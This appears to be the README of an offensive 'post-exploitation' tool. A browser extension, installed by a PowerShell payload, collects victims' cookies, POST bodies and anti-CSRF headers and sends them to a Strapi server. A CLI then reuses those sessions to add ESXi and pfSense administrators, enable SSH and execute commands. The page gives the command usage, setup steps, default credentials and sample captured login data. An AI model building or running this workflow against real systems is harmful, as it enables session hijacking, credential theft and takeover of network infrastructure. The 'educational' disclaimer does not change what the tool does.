
Post-exploitation tool collects data going out and coming into the browser and make use of it.

Primary LanguagePythonMIT LicenseMIT



This is a post-exploitation Red-Teaming tool. It gathers data going out and coming into the browser — data like POST requests, cookies, and chosen headers like (ANTI-CSRF headers), then sends all data to Strapi. Strapi and MongoDB store the data so that 6-Eyed-Spider-CLI can use the collected data to perform specific attacks. Attacks using the users' valid cookies to execute commands, create admin users, enable unsafe functionalities, manipulate data in systems like VMware, Pfsense, and PanOS.

The tool takes advantage of how web applications usually are designed. No matter how many authentication steps a web application uses, there will be a weak point where if you know specific tokens, you will be able to interact with the application without the need for reauthenticating. The tool uses these specific tokens to perform critical tasks as authenticated users. It also deals with Anti-CSRF protection; thus, almost every request can be passed.

The tool consists of a couple of parts:

  • Dockerized MongoDB and Strapi
    • MongoDB stores the collected data.
    • Strapi receives and manages the collected data.
  • Google-Chrome Extention
    • Collects the browser's data from the blue team.
  • 6-Eyed-Spider-CLI
    • Runs custom made plugins which make use of the collected data.


This Red-Team tool is used for educational purposes ONLY!

Table of contents:

How to:

Use 6-Eyed-Spider-CLI:

Welcome! Type ? to list commands
6-Eyed-Spider> ?

Documented commands (type help <topic>):
Add_ESXI_Admin           Print_all_ESXis_under_control     exit
ESXI_Enable_SSH          Print_all_pfSenses_under_control  help
Execute_pfSense_Command  Print_creds                     

6-Eyed-Spider> help Add_ESXI_Admin
Add admin user.
Usage: Add_ESXI_Admin <ESXI_IP> <USERNAME> <STRONG_PASSWORD> <Description>
Add_ESXI_Admin BLACK_TEAM Liverpool!1!1! Description1
Add_ESXI_Admin ADMIN Liverpool!1998 Description2

6-Eyed-Spider> help Execute_pfSense_Command
Enable SSH.
Usage: Execute_pfSense_Command <pfSense_IP> <Command>
Execute_pfSense_Command id
Execute_pfSense_Command whoami

6-Eyed-Spider> Execute_pfSense_Command whoami


6-Eyed-Spider> Print_all_pfSenses_under_control


Install 6-Eyed-Spider:

[M507:~]$ bash Install.sh

Run the server manually:

[M507:~]$ # Start the database
[M507:~]$ docker-compose -f docker-compose-db.yml up --build -d
[M507:~]$ # Wait 20 seconds until its states changes to healthy 
[M507:~]$ watch docker-compose -f docker-compose-db.yml ps
[M507:~]$ # Insert db.dump into the database, using this command
[M507:~]$ docker exec -i strapi-docker_db_1 sh -c 'mongorestore --archive'< RedAdmin.dmup
[M507:~]$ # Start the Strapi
[M507:~]$ docker-compose -f docker-compose-main.yml up --build -d

Or run Run.sh, which executes the same commands above.

[M507:~]$ bash Run.sh

Configure the admin panel and the API address from:

[M507:~]$ cat ./strapi-app/config/environments/development/server.json
  "host": "localhost",
  "port": 1337,
  "proxy": {
   "enabled": false
  "autoReload": {
    "enabled": true
  "cron": {
    "enabled": false
  "admin": {
    "autoOpen": false

Info ☄️ Default Admin panel: http://localhost:1337/admin Info ⚡️ Default Server: http://localhost:1337

Then with administrator privileges:

Default credentials: admin:RedAdmin

    "IP": "",
    "ID": 31231,
    "Site": "https://aavtrain.com/index.asp",
    "Data": {
        "Submit": "Submit",
        "login": "true",
        "password": "MYPASSWORD",
        "user_name": "admin"
    "Type": "Cookies"


Microsoft Windows [Version 10.0.17763.503]
(c) 2030 Microsoft Corporation. All rights reserved.

C:\Users\Mohad> .\New-ChromeExtension.ps1 (Powershell Payload attached). 

6-Eyed-Spider-CLI Plugins:

6-Eyed-Spider-CLI runs customized plugins that make use of the valid collected data from the API.

  • VMware
    • Add an administrator
    • Start SSH
  • Pfsense
    • Add an administrator
    • Execute a command


  • Docker-compose


  • Firefox extension configures itself based on the data in /domains and /headers.
  • Firefox extension sends All POST requests and cookies to /Posts as described above.
  • New-FirefoxExtension.ps1